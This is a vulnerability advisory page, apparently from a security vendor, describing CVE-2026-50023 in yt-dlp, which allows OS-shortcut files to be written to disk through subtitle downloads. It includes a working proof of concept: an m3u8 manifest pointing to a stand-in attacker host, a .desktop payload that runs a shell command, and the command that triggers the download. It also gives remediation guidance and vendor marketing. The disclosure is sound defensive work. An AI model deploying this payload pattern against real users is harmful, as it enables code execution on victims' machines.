CVE-2026-50023

CVE-2026-50023 is a high-severity security vulnerability in yt-dlp (pip), affecting versions < 2026.06.09. It is fixed in 2026.6.9.

Summary

A vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as .desktop, .url, .webloc) to the user's filesystem, bypassing the remediation for CVE-2024-38519.

Details

The fix for CVE-2024-38519 enforced an allowlist for file extensions, in order to prevent writing files with unsafe extensions (such as .exe or .sh) during file downloads. However, this allowlist explicitly included the unsafe extensions .desktop, .url, and .webloc so that the functionality of the --write-link option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download.

Numerous yt-dlp extractors derive the downloaded media or subtitles file extension from a potentially attacker-controlled source. An attacker could craft an m3u8 file that contains an EXT-X-MEDIA:TYPE=SUBTITLES tag with a malicious URI (e.g., URI="http://attacker/x.desktop"), which would result in yt-dlp writing the attacker-controlled content to a file with a .desktop extension if the user had passed the --write-subs option.

Writing OS-shortcut files next to downloaded videos provides a high-probability social engineering vector. The extension of the shortcut file is often hidden from the user, e.g. on Windows by default or on many Linux desktop environments.

While these shortcut files are typically used to point to web locations via URLs, they can also contain shell commands or point to remote executables. The user may be deceived into opening the malicious shortcut disguised as a "subtitles"/media file, leading to a phishing attack or arbitrary code execution.

Proof of Concept

1. Start a malicious server:
Host a malicious master.m3u8 manifest that points to malicious subtitle payloads:

#EXTM3U
#EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID="subs",NAME="English",URI="http://attacker/payload.desktop",LANGUAGE="en"

And host the payload.desktop file with malicious content:

[Desktop Entry]
Type=Application
Exec=sh -c "touch /tmp/ytdlp_pwned_$(id -u)"
Name=Subtitle

2. Trigger the download:
In this case, the generic extractor triggers the exploit if the --write-subs option is used:

yt-dlp --write-subs -o "MyVideo.%(ext)s" "http://attacker/master.m3u8"

Result: yt-dlp writes MyVideo.en.desktop to disk, containing the attacker payload.

Workarounds

It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.

Users who are not able to upgrade should do ALL of the following:

  • Only pass fully trusted input URLs to yt-dlp
  • Do not use the --write-subs, --write-auto-subs, --embed-subs, --write-thumbnail, --write-all-thumbnails, or --embed-thumbnail options
  • Use --format - to interactively select download formats and validate their file extensions

Impact

CVE-2026-50023 has a CVSS score of 8.3 (High). The attack vector is network, no privileges are required, and user interaction is required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2026.6.9); upgrading removes the vulnerable code path.

Affected versions

yt-dlp (< 2026.06.09)

Security releases

yt-dlp → 2026.6.9 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

yt-dlp version 2026.06.09 fixes this issue by removing .url, .desktop and .webloc from the global file extension allowlist, and by only allowing those file types to be written from within the context of the --write-link options' functionality.
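To make that remediation concrete, the following is an added Python sketch (not yt-dlp's own code) of the allowlist split it describes: the extension lists, the extractor-style extension derivation and the sanitize_ext / subtitle_filename helpers are assumptions for illustration, not yt-dlp APIs.

```python
# Added example (not yt-dlp's own code): models the allowlist split described in
# the advisory. The lists, names and helper functions are assumptions.
import os

# Constructed allowlist of media/subtitle extensions a download may legitimately produce.
MEDIA_EXTS = frozenset({"mp4", "mkv", "webm", "m4a", "mp3", "vtt", "srt", "ttml"})
# OS-shortcut extensions that only the --write-link family should ever emit.
SHORTCUT_EXTS = frozenset({"url", "desktop", "webloc"})
# Pre-fix state: shortcut extensions sat in the global allowlist (CVE-2026-50023).
VULNERABLE_ALLOWLIST = MEDIA_EXTS | SHORTCUT_EXTS
# Post-fix state (2026.06.09): shortcut extensions removed from the global allowlist.
FIXED_ALLOWLIST = MEDIA_EXTS


def extension_from_uri(uri: str) -> str:
    """Derive an extension the way an extractor might: from the URI's last path segment."""
    path = uri.split("?", 1)[0].split("#", 1)[0]
    return os.path.splitext(path.rsplit("/", 1)[-1])[1].lstrip(".").lower()


def sanitize_ext(ext: str, allowlist: frozenset, in_write_link: bool = False) -> str:
    """Return ext if it may be written in this context, otherwise raise ValueError.

    Shortcut extensions are accepted only on the --write-link code path, never for
    media or subtitle files whose extension was derived from remote input.
    """
    if in_write_link:
        if ext in SHORTCUT_EXTS:
            return ext
        raise ValueError(f"write-link may only emit {sorted(SHORTCUT_EXTS)}, got .{ext}")
    if ext in allowlist:
        return ext
    raise ValueError(f"refusing to write file with extension .{ext}")


def subtitle_filename(base: str, lang: str, uri: str, allowlist: frozenset) -> str:
    """Build '<base>.<lang>.<ext>' for a subtitle track, applying the given allowlist."""
    ext = sanitize_ext(extension_from_uri(uri), allowlist)
    return f"{base}.{lang}.{ext}"
```

With the fixed allowlist a subtitle URI ending in .desktop is rejected before any file is created, while the write-link path still emits its shortcut formats.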

Frequently Asked Questions

  1. What is CVE-2026-50023? CVE-2026-50023 is a high-severity security vulnerability in yt-dlp (pip), affecting versions < 2026.06.09. It is fixed in 2026.6.9.
  2. How severe is CVE-2026-50023? CVE-2026-50023 has a CVSS score of 8.3 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of yt-dlp are affected by CVE-2026-50023? yt-dlp (pip) versions < 2026.06.09 are affected.
  4. Is there a fix for CVE-2026-50023? Yes. CVE-2026-50023 is fixed in 2026.6.9. Upgrade to this version or later.
  5. Is CVE-2026-50023 exploitable, and should I be worried? Whether CVE-2026-50023 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-50023 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-50023? Upgrade yt-dlp to 2026.6.9 or later.

Other vulnerabilities in yt-dlp

  • CVE-2026-50574
  • CVE-2026-50023
  • CVE-2026-50019
  • CVE-2024-38519
  • CVE-2024-22423
